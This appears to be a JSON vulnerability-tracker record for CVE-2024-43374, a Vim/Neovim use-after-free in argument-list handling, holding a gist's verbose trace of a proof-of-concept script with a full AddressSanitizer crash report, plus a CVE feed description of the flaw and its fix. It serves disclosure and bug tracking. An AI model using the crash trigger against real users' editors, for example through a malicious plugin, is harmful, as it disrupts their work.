{"vulnerability": "cve-2024-43374", "sightings": [{"uuid": "65b3e556-5294-43b2-aa21-13d9a7f7ab04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/fac94632a3c276db37727514a35608fd", "content": "Command:\n./nvim-0.10.4 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c qa!\n\n=== OUTPUT ===\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.Inspect                 Inspect\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1:  \n\nline 2: an^?|\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc:\nline    2:\nE329: No menu \"^?\"\nline 3: au    BufNew  ile,,3,^S,*,*,.gRowseiq,*,*.^la^?^I:bw\n\nline 4: n^R^R^R^R^R^R^R^R^R^Rightbw\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! 
b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline 5: we^?\n\nline    5:\nE492: Not an editor command: we^?\nline 6: 0sv]<88>N,\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline    6:\nE444: Cannot close last window\nline 7: \n\nline 8: diffs\n\nline 8: set sbo+=hor\n\nline 9: daru<82>e^Hw/\n\nline    9:\nE492: Not an editor command: daru<82>e^Hw/\nline 10: lv}$}\"\n\n\"\"\"\" [New]\nCannot open file \"\"\"\nline   10:\nE480: No match: $\nline 11: ;$\n\nline 12: dif<99>s@^?]^Pcl{{0^\\db\n\nline   12:\nE488: Trailing characters: <99>s@^?]^Pcl{{0^\\db: dif<99>s@^?]^Pcl{{0^\\db\nline 13: argl{{0}2\n\nExecuting command: \"[[ ${BASH_VERSINFO[0]} -ge 4 ]] && shopt -s globstar; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/nvim.zzw/oo5n4h/0 {{0}2\"\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc[13]..BufNew Autocommands for \"*\":\nE1156: Cannot change the argument list recursively\nExecuting: diffoff!\n\nExecuting: set sbo-=hor\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! 
b:keymap_name\n=================================================================\n==107413==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000005b40 at pc 0x00000065f45d bp 0x7ffdd2eb5d30 sp 0x7ffdd2eb5d28\nREAD of size 8 at 0x603000005b40 thread T0\n    #0 0x65f45c in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5\n    #1 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #2 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #3 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #4 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #18 0x47000d in _start 
(/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x47000d)\n\n0x603000005b40 is located 16 bytes inside of 32-byte region [0x603000005b30,0x603000005b50)\nfreed by thread T0 here:\n    #0 0x4e84cd in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e84cd)\n    #1 0xce9119 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:144:3\n    #2 0x65ede3 in alist_unlink /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:116:5\n    #3 0x12ce2de in win_free /home/zzw/Desktop/neovim/build/../src/nvim/window.c:5207:3\n    #4 0x12c48bb in win_free_mem /home/zzw/Desktop/neovim/build/../src/nvim/window.c:3100:3\n    #5 0x12a0a8c in win_close /home/zzw/Desktop/neovim/build/../src/nvim/window.c:2858:8\n    #6 0x693e43 in do_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1391:11\n    #7 0x6984f7 in do_bufdel /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1057:5\n    #8 0x9ea833 in ex_bunload /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:4467:17\n    #9 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #10 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #11 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #12 0x67b3df in apply_autocmds_group /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1830:5\n    #13 0x67ff56 in apply_autocmds /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1498:10\n    #14 0x69802d in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:2009:9\n    #15 0x6a4d75 in buflist_add /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:3091:16\n    #16 0x65f42d in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:222:7\n    #17 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #18 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #19 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #20 
0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #21 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #22 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #23 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #24 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #25 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #26 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #27 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #28 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #29 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n\npreviously allocated by thread T0 here:\n    #0 0x4e874d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e874d)\n    #1 0xce8ef7 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:98:15\n    #2 0xce90c4 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:132:15\n    #3 0x65ee01 in alist_new /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:123:21\n    #4 0x66136a in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:536:7\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 
/home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5 in alist_add\n==107413==ABORTING", "creation_timestamp": "2026-06-08T10:57:49.000000Z"}, {"uuid": "a51afbac-c1bb-4b3a-a7c8-e8afa1af715c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/jamincollins/eeeaa5b5a021f181d02cd557edf76515", "content": "", "creation_timestamp": "2025-07-09T21:28:20.000000Z"}, {"uuid": "c2fec622-a22a-4836-b28f-aaa3de78ba86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://t.me/cvedetector/3316", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-43374 - \"Vim Use-After-Free Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-43374 \nPublished : Aug. 16, 2024, 2:15 a.m. | 37\u00a0minutes ago \nDescription : The UNIX editor Vim prior to version 9.1.0678 has a use-after-free error in argument list handling. When adding a new file to the argument list, this triggers `Buf*` autocommands. If in such an autocommand the buffer that was just opened is closed (including the window where it is shown), this causes the window structure to be freed which contains a reference to the argument list that we are actually modifying. Once the autocommands are completed, the references to the window and argument list are no longer valid and as such cause an use-after-free. Impact is low since the user must either intentionally add some unusual autocommands that wipe a buffer during creation (either manually or by sourcing a malicious plugin), but it will crash Vim. The issue has been fixed as of Vim patch v9.1.0678. 
\nSeverity: 4.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-16T05:21:43.000000Z"}]}